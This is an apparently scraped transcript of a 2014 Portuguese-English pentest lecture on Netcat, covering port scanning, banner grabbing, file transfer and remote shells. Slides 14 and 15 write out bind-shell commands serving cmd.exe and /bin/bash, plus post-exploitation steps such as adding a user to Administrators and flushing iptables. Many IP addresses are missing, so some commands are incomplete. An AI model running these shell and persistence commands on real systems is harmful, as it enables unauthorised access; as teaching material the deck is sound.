Presentation is loading. Please wait.

Presentation is loading. Please wait.

Pentest com script shell & Perl Cerutti – IESGF - 2014.

Similar presentations


Presentation on theme: "Pentest com script shell & Perl Cerutti – IESGF - 2014."— Presentation transcript:

1 Pentest com script shell & Perl Cerutti – IESGF

2 Ping broadcast Veja a mascara da sura rede. O IP de broadcast é o que tem, segundo a máscara, todos os bits de host=1. Por exemplo: – Meu IP na rede é – A mascara é – O end de broadcast será

3 root# ping PING ( ): 56 data bytes 64 bytes from : icmp_seq=0 ttl=64 time=0.063 ms 64 bytes from : icmp_seq=0 ttl=64 time= ms 64 bytes from : icmp_seq=1 ttl=64 time=0.117 ms 64 bytes from : icmp_seq=1 ttl=64 time= ms

4 Netcat According to SecTools.org, Netcat is ranked as the eighth favorite network security tool (Nmap Security Scanner Project, 2011

5 d/14051/nc110.tgz d/14051/nc110.tgz sudo apt-get install netcat-traditional

6 Desativar firewall Iptables -F

7 Chat interface

8 Hypervisors

9 Conectar porta conectar porta alta qualquer, por exemplo portaTCP 1234 $ nc -l 1234 nc is now listening on port 1234 for a connection. On a second console (or a second machine), connect to the machine and port being listened on: $ nc

10 chat

11 transferindo dados com Netcat –vv (double v) for additional verbosity that will give you the number of bytes transferred during a file transfer. The –w switch instructs Netcat to wait for a specific number of seconds before timing out the connection. In our example, we specify 30 seconds

12 Transferencia no MAC-OSX nc -v -w 30 -p 1234 –l > secret.txt Start by using nc to listen on a specific port, with output captured into a file: $ nc -l 1234 > filename.out Using a second machine, connect to the listening nc process, feeding it the file which is to be trans- ferred: $ nc host.example.com 1234 < filename.in After the file has been transferred, the connection will close automatically.

13 banner grabbing with Netcat

14 Windows remote shell (and simple post-exploitation hi-jinks) Preparing the listener nc –Lp –vv –e cmd.exe Connecting to the target nc – Dir c:/ – Md /invasao – net localgroup Administrators bob

15 Linux shell sudo nc –lp –e /bin/bash Connecting to the target As I have demonstrated in the previous exercise, you simply connect to the host (as shown below) and the port that you want to connect to, and the listener will serve up the bash shell for you as follows: nc grep bob /etc/passwd

16 Abrindo paginas web no servidor $ echo -n "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80

17 Enviando $ nc localhost 25 << EOF HELO host.example.com MAIL FROM: RCPT TO: DATA Body of .. QUIT EOF

18 Varredura de portas $ nc -z host.example.com Connection to host.example.com 22 port [tcp/ssh] succeeded! Connection to host.example.com 25 port [tcp/smtp] succeeded! The port range was specified to limit the search to ports

19 which server software is running, and which versions. o first make a connection, and then break the connection when the banner has been retrieved. This can be accomplished by specifying a small timeout with the -w flag, or perhaps by issuing a "QUIT" command to the server: $ echo "QUIT" | nc host.example.com SSH-1.99-OpenSSH_3.6.1p2 Protocol mismatch. 220 host.example.com IMS SMTP Receiver Version 0.84 Ready

20 Open a TCP connection to port 42 of host.example.com using as the IP for the local end of the connection: $ nc -s host.example.com 42 Create and listen on a Unix Domain Socket: $ nc -lU /var/tmp/dsocket Connect to port 42 of host.example.com via an HTTP proxy at , port This example could also be used by ssh(1); see the ProxyCommand directive in ssh_config(5) for more information. $ nc -x :8080 -Xconnect host.example.com 42

21 Scanning a range of devices with a script for i in {10..12}; do nc –vv –n –w $i –z; done

22 Official sites Unix Netcat Homepage: GNU Netcat Project: Ncat – The Nmap Project:

23 Articles and tutorials Offensive Security explains how to create a persistent back door using Netcat and Metasploit's Meterpreter: Netcat_Backdoor Crazy Netcat Relays for Fun and Profit: Ass_Netcat_Relays_for_Fun_and_Profit SANS Institute Netcat Pocket Cheatsheet: v1.pdf Some interesting use cases not covered in this book by Johannes Franken: A great reference for using Netcat for debugging SOAP and XML web services using Netcat: web-services/

24 Twitter Follow Thomas Wilhelm on Twitter: https://twitter.com/#!/thomas_wilhelm Follow Brian Baskin on Twitter: https://twitter.com/#!/bbaskin Follow Michael Scherer on Twitter: https://twitter.com/#!/theprez98 Follow Ed Skoudis on Twitter: https://twitter.com/#!/edskoudis For more Open Source information, follow Packt at:


Download ppt "Pentest com script shell & Perl Cerutti – IESGF - 2014."

Similar presentations


Ads by Google